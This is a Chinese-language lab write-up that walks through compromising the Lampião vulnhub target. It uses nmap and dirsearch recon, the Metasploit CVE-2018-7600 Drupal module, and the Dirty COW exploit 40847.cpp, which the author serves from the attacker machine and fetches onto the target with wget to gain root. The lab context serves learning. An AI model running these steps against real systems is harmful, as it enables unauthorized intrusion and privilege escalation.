赞
踩
Kali版本:2022.3
目标主机ip:192.168.186.148
攻击机ip:192.168.186.147
vulnhub和vulhub不同,无需安装环境。
lampiao下载地址:https://www.vulnhub.com/entry/lampiao-1,249
下载完成正常解压后,vmware打开ovf格式文件,创建lampiao虚拟机文件即可,设置网络为NAT模式
登陆界面如下,此时账户密码未知,需要我们去找啦
1、使用nmap命令对网段进行扫描,以确定lampiao靶机具体的ip地址。
ssh:远程连接
- nmap -sS -Pn 192.168.186.0/24
- //-sS SYN扫描,使用最频繁,安全、快
- //-Pn 目标机禁用ping,绕过ping扫描
2、分别访问22端口(无法访问)和80端口(如图)
3、具体扫描一下该ip所有端口号,有新发现,访问该端口
nmap 192.168.186.148 -p1-65535
1)点击两个“read more”,分别显示?q=node/1和?q=node/3。
2)唯独没有?q=node/2,试着访问一下,显示有两个文件
3)访问qrc.png,这里我用了离线识别二维码的小工具,大家也可以用微信扫描。
4)没什么有用信息,所以我们去听音频。得到user:tiago
1)通过dirsearch对该端口进行目录扫描,得到以下文件
dirsearch -u http://192.168.186.148:1898 #-u 指定网址
2)访问CHANGE.txt文件,发现cms框架信息为Drupal 7.54
3)百度看到有CVE-2018-7600远程代码执行漏洞
4)使用msf,查找CVE-2018-7600漏洞
- msfconsole
- search CVE-2018-7600
5)选中该漏洞,并设置好目标
- use 0
- show options #可以查到当前配置信息,需要配置目标主机的ip地址和端口
- set rhosts 192.168.186.148 #设置目标地址
- set rport 1898 #设置端口
- show options
6)运行,可以输入命令测试
- run
- shell #转换为有回显的shell
7)查看所有文件,但是无法访问root文件夹,此时需要提升权限。
- ls -al #列出所有文件,包括隐藏文件
-
- cd root
1、通过searchsploit工具找到提权脚本,定位40847.cpp,下载到/tmp目录
- searchsploit dirty
- locate linux/local/40847.cpp #定位40847.cpp的位置
- cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp #将40847.cpp复制到/tmp目录下
2、首先进入tmp目录,然后开启http服务,选用8080端口
python -m http.server 8080
3、在目标主机下载40847.cpp文件,并进行编译成40847可执行文件
wget http://192.168.186.147:8080/40847.cpp
4、执行该文件,可以得到root用户对应的密码!!
./40847
5、去lampiao靶机登录,用户名root,密码dirtyCowFun,去查看所有文件,成功找到flag~
- ls -al
- cat flag.txt
参考的大佬博客链接:
完结撒花*★,°*:.☆( ̄▽ ̄)/$:*.°★* 。~!
又肝了好几个小时,遇到了很多问题,记录的过程对脏牛提权有了更加深入和清晰的认识啦~
希望能帮助到和我一样是小白的同学们捏~( ̄▽ ̄)~*
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。